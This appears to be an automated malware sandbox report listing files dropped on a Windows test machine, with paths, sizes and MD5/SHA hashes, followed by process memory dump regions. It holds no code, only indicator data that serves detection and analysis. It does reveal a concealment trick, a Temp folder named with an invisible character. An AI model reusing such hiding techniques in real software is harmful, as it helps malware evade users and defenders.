e5ca0ddc2758891090db726de2d3fd7f2ba64e309979136b4d3299445b1f751dfd8cd56bb3343499cb6ed479c08732d1d349d32b7f7e5ac417352bd0ce676253

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dar0j0jd.lqe.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Desktop\AddCheckpoint.jpg

Filesize
1.1MB

MD5
ac933a6d9d0ed891163028237ee43f6d

SHA1
11f3a96a161bbd2af4734d9ac45d53cee89b61f1

SHA256
c8e37883be9c66dfd8fd8bae2e3c61c2d72404649f30fee79c0c61195604ea30

SHA512
f0164fe117712d1306e3de81a13e8c0029217c6acead04bc65d40f6cdea43ee0ec1ad8d63c8ebe77f77a010dac35792034646e5989545cb752afe67a7db2fe16

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Desktop\AddTrace.docx

Filesize
14KB

MD5
2ff40a4006cf5b0b1765cb8f89a1a3a0

SHA1
76677d853e2ce8e04413c0dd9d089deba6f0482b

SHA256
2abb98a9c965da53491715b4d3e282f584f204f08de23885d2717ebcb8ea18d8

SHA512
aec699b31356fbcc922ffe2e8c00e69093b0f4b90185e4ff3d0d8c5fc2d702fbe2ca3277fb04e2a1f4425dedb30972ae0dcdf0dbe4b0029ea644bee30232aee7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Desktop\BackupNew.docx

Filesize
19KB

MD5
a5b5d5bd1dabfa2c25ccd413b8637122

SHA1
622977145b8923076a021ec760ff5a33aeb28574

SHA256
1bf16c850a2c3b5176b14354fa94c7ec9ee36c4ffd18ed4bec45c8faa1854274

SHA512
9b9a8d3fb3a2d5b960dc548bc974d10d8c1a1b6f828e7d2475665ff79aa5ea1f6a77acec10dc1bc645b1ad536b132d0bcfc702687516ef1e34123363c2ca2d95

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Desktop\PingComplete.docx

Filesize
17KB

MD5
03913b9e9664c2a5f8dd05263ed26041

SHA1
fa80d7940aec6a09c26acc200ef3cff54eb2ba70

SHA256
087bb45d9204589d04aa766fbf53b58d8e5afd846c992ff34487160bb78387c9

SHA512
bee4954654b574e0e31f16231692badbf0c1a00620494d9ce49aa6e896f986149ad47ae13ba549c64c7a3ea2e6b5994367a5b59608f20acc1dd9c7dc6731415d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Desktop\RevokeRequest.docx

Filesize
13KB

MD5
5ab884fefe8f9e8cb62d1747d7e644df

SHA1
9cfec96349841a1e297c0a8eb5576e029e6c9bce

SHA256
6473cfd53db32ab8dbbc3f7ecf7c1ac0cf103984eebd6d14a1bd48fda94b1bc9

SHA512
cd645ecd3f64b62237dfb40daf2cb4d3bacb058cb37b6e41bb6deb6fc821ff00496e7a1f97b9ccd9b0d1708a5b9396826b2022ce4f112d08c5d50af4ef189161

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Desktop\SyncHide.docx

Filesize
14KB

MD5
ae4c87fc7d969800864702f18a174132

SHA1
5ed46e38a7d5d6aee1961f33038cd556bf57e250

SHA256
127342c703512a82d52a1dff178f6e68f641df3d84d3b24d898821e60eb37946

SHA512
8af2afd6a99203b017812b455203759c9c5bf0f914615584d3de8c44aa51f5dca7719bc7367007cdb0b38233632d7ce5d34fe06c43c84d4cf77c88d665378e28

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Desktop\TraceDisconnect.xlsx

Filesize
11KB

MD5
6aea2bf6f312a35cc350a2eea380d509

SHA1
2511dc16cf200c7e29990fd7a145d0689799bbb4

SHA256
4a4ed1a7db477e9d45d7a9be57bdc75b5e2929fc3558034d2c24d03260a07dc0

SHA512
0a150880e9814d11d15758b5195338d2839b0191785f23ebc2a85d08d819b3dcd850f2f2c4df16e08a274fd3515aa2c10b80a70db10156230ebdd16f53dadf9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Documents\ConfirmUpdate.xlsx

Filesize
11KB

MD5
8c616da0aeca2d0d8256ecf106b02efd

SHA1
b429d0b64e9abafe887a18b43c2696e94cd394eb

SHA256
81cda95b926e31433c86c53e80a3bde2aceaa91ca5ff6d6a4230dd6d8f272aff

SHA512
a854a4c9c1ba14c7bc7ed91d58c94318d775d9882950a9ba23d6ab648176cb2b5695839352eb4a937cbf8b7efc5ef38378e878a1115b482cb54783ecc26b662b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Documents\HideStep.txt

Filesize
1.1MB

MD5
9acee1b8d6681840b01e62225316d24f

SHA1
32ec4ebb6413c77ee5482efff433d8d978fca00d

SHA256
1a6f3bc1518db8c3916fc99bb7b8218bc797485bc3259d6efa95196482f523fe

SHA512
7f79866079cf1a3f1ab5ffab249cc29a519107e7ebcc5073459dfa5589462350f26ca27713070033229412c8827c40f9e7f7fa5f60b6c2d456024da5e3356e58

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Documents\MoveSync.xlsx

Filesize
13KB

MD5
f43ab0f5b8f28c3bcbd4e2331a04a745

SHA1
9d4fa8a93887868579f15efe8f60822d2d450990

SHA256
34431297c80cb17ddcbaed84ee05a9b08ced8a35fb2ca4b735786000e4b4ff62

SHA512
149e117c11155b9d92d4869112175c9a804aa08574ef23781ff528a6566bc4565abf8279ba7de2f68242291f4634b9ec9a7206e32597fe89b0cb149b4f2bb1cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Documents\RevokeUnblock.docx

Filesize
20KB

MD5
32ff46da7722712ba83edbc3dd550508

SHA1
5811113fd7bff1f781983a5b26758b8e81c4b905

SHA256
5c9900771f6754bd892081884280c9f84d201620e2ece67e1048cded571521b9

SHA512
bf5d55ac950102c5c5bba44f405368e71f5be37c9201dfc132e828d9c1e9c43828eb95c1cd337a2fc7ca277f0a94ba4b1bd5cbef735bda25147d0565504d091a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Documents\SetDebug.doc

Filesize
1.2MB

MD5
70acd6d483c9c790bf8627fb488d881d

SHA1
a1e75bdb3e4ce4a2deb51e3fb1645e06afff294e

SHA256
cae0c17c2b66a6111fbbfd28e1d9b5ae2bd5f27958f7ee790a937f79b4082944

SHA512
7ed439e036f4f5789a3a430765b995edd99b64f2f57fb1e6be139d53d23197286626e709761f51eb5cc49e64f2329bb78b61fb99f933900ebda03ff6db781e65

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Documents\StartExport.docx

Filesize
548KB

MD5
bfe060f89bdf07734ea3caad70ec6a67

SHA1
3a68aba88a2de6584f9cbed92053c4766f1011f4

SHA256
de4863a37041d5cf69fb331921b7899ecc5a3aeeee606101f0f4c60db721217b

SHA512
6198133ca0b10cf6894cbc9b08a6a070231d66a5356d29f3edc451deb8602b85b7c5e3043337ddb3dd839555bcb5bb27d05f530aa4373ffed787fd37fd3c1d10

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4zh421wu\4zh421wu.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4zh421wu\4zh421wu.cmdline

Filesize
607B

MD5
23405f1166c7de94eb9c1d7699259f06

SHA1
5f3a820777c11b361f70b8728826938325cbc80d

SHA256
47291ae138a316e090d92bfcc96f895b00a7bdee09ac10e59eff3a796639fec1

SHA512
d73db277a575dee0105f6e0b30f10ecc7a40982b6252400570d261e39ec45edb59ab6fa46727aaef2da5ff0cb5dd694b03aaed0959a4ec2b1b7e55b962557d32

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4zh421wu\CSC2B984293365D4B7D85734A35143A91E.TMP

Filesize
652B

MD5
b46093260d044248a1165475e901345d

SHA1
18dfe2e1aa15c3e6f321d93ae2f7be32f43d5428

SHA256
49c86f808332d31826f9d18e454df4f5a85bec44fd189eed45854a69e278901d

SHA512
21765423e8da6cb05f5fba32b60e7fb0c2456c47a4dba834b18ccd4202f075ebf080283dad1b61c97ccde7a2e621da7c43ee2f1d37b0872149fc6ceb99a9b55b

Download Submit
memory/1328-91-0x0000015DFE5C0000-0x0000015DFE5E2000-memory.dmp

Filesize
136KB

Download
memory/1804-199-0x0000018171420000-0x0000018171428000-memory.dmp

Filesize
32KB

Download
memory/4428-30-0x00007FFFC0970000-0x00007FFFC0995000-memory.dmp

Filesize
148KB

Download
memory/4428-291-0x00007FFFBBB50000-0x00007FFFBBCC7000-memory.dmp

Filesize
1.5MB

Download
memory/4428-72-0x00007FFFBBF70000-0x00007FFFBC03D000-memory.dmp

Filesize
820KB

Download
memory/4428-73-0x00007FFFBDD60000-0x00007FFFBDD93000-memory.dmp

Filesize
204KB

Download
memory/4428-80-0x00007FFFC0940000-0x00007FFFC096D000-memory.dmp

Filesize
180KB

Download
memory/4428-81-0x00007FFFBB870000-0x00007FFFBB98B000-memory.dmp

Filesize
1.1MB

Download
memory/4428-76-0x00007FFFC08E0000-0x00007FFFC08ED000-memory.dmp

Filesize
52KB

Download
memory/4428-274-0x00007FFFBDDA0000-0x00007FFFBDDC4000-memory.dmp

Filesize
144KB

Download
memory/4428-74-0x00007FFFC0970000-0x00007FFFC0995000-memory.dmp

Filesize
148KB

Download
memory/4428-66-0x00007FFFC0920000-0x00007FFFC0939000-memory.dmp

Filesize
100KB

Download
memory/4428-64-0x00007FFFBBB50000-0x00007FFFBBCC7000-memory.dmp

Filesize
1.5MB

Download
memory/4428-62-0x00007FFFBDDA0000-0x00007FFFBDDC4000-memory.dmp

Filesize
144KB

Download
memory/4428-60-0x00007FFFC1B20000-0x00007FFFC1B39000-memory.dmp

Filesize
100KB

Download
memory/4428-58-0x00007FFFAC330000-0x00007FFFAC852000-memory.dmp

Filesize
5.1MB

Download
memory/4428-56-0x00007FFFC1C00000-0x00007FFFC1C15000-memory.dmp

Filesize
84KB

Download
memory/4428-54-0x00007FFFC0940000-0x00007FFFC096D000-memory.dmp

Filesize
180KB

Download
memory/4428-71-0x00007FFFC34E0000-0x00007FFFC34ED000-memory.dmp

Filesize
52KB

Download
memory/4428-32-0x00007FFFC34F0000-0x00007FFFC34FF000-memory.dmp

Filesize
60KB

Download
memory/4428-25-0x00007FFFAC860000-0x00007FFFACF30000-memory.dmp

Filesize
6.8MB

Download
memory/4428-70-0x00007FFFAC860000-0x00007FFFACF30000-memory.dmp

Filesize
6.8MB

Download
memory/4428-164-0x00007FFFC1C00000-0x00007FFFC1C15000-memory.dmp

Filesize
84KB

Download
memory/4428-207-0x00007FFFAC330000-0x00007FFFAC852000-memory.dmp

Filesize
5.1MB

Download
memory/4428-293-0x00007FFFC0920000-0x00007FFFC0939000-memory.dmp

Filesize
100KB

Download
memory/4428-313-0x00007FFFBBF70000-0x00007FFFBC03D000-memory.dmp

Filesize
820KB

Download
memory/4428-315-0x00007FFFBDD60000-0x00007FFFBDD93000-memory.dmp

Filesize
204KB

Download
memory/4428-316-0x00007FFFAC860000-0x00007FFFACF30000-memory.dmp

Filesize
6.8MB

Download
memory/4428-317-0x00007FFFC0970000-0x00007FFFC0995000-memory.dmp

Filesize
148KB

Download
memory/4428-331-0x00007FFFAC860000-0x00007FFFACF30000-memory.dmp

Filesize
6.8MB

Download
memory/4428-346-0x00007FFFBDD60000-0x00007FFFBDD93000-memory.dmp

Filesize
204KB

Download
memory/4428-344-0x00007FFFC08E0000-0x00007FFFC08ED000-memory.dmp

Filesize
52KB

Download
memory/4428-357-0x00007FFFBBF70000-0x00007FFFBC03D000-memory.dmp

Filesize
820KB

Download
memory/4428-356-0x00007FFFC34E0000-0x00007FFFC34ED000-memory.dmp

Filesize
52KB

Download
memory/4428-355-0x00007FFFC0920000-0x00007FFFC0939000-memory.dmp

Filesize
100KB

Download
memory/4428-354-0x00007FFFBBB50000-0x00007FFFBBCC7000-memory.dmp

Filesize
1.5MB

Download
memory/4428-353-0x00007FFFBDDA0000-0x00007FFFBDDC4000-memory.dmp

Filesize
144KB

Download
memory/4428-352-0x00007FFFC1B20000-0x00007FFFC1B39000-memory.dmp

Filesize
100KB

Download
memory/4428-351-0x00007FFFAC330000-0x00007FFFAC852000-memory.dmp

Filesize
5.1MB

Download
memory/4428-350-0x00007FFFC1C00000-0x00007FFFC1C15000-memory.dmp

Filesize
84KB

Download
memory/4428-349-0x00007FFFC0940000-0x00007FFFC096D000-memory.dmp

Filesize
180KB

Download
memory/4428-348-0x00007FFFC34F0000-0x00007FFFC34FF000-memory.dmp

Filesize
60KB

Download
memory/4428-347-0x00007FFFC0970000-0x00007FFFC0995000-memory.dmp

Filesize
148KB

Download
memory/4428-345-0x00007FFFBB870000-0x00007FFFBB98B000-memory.dmp

Filesize
1.1MB

Download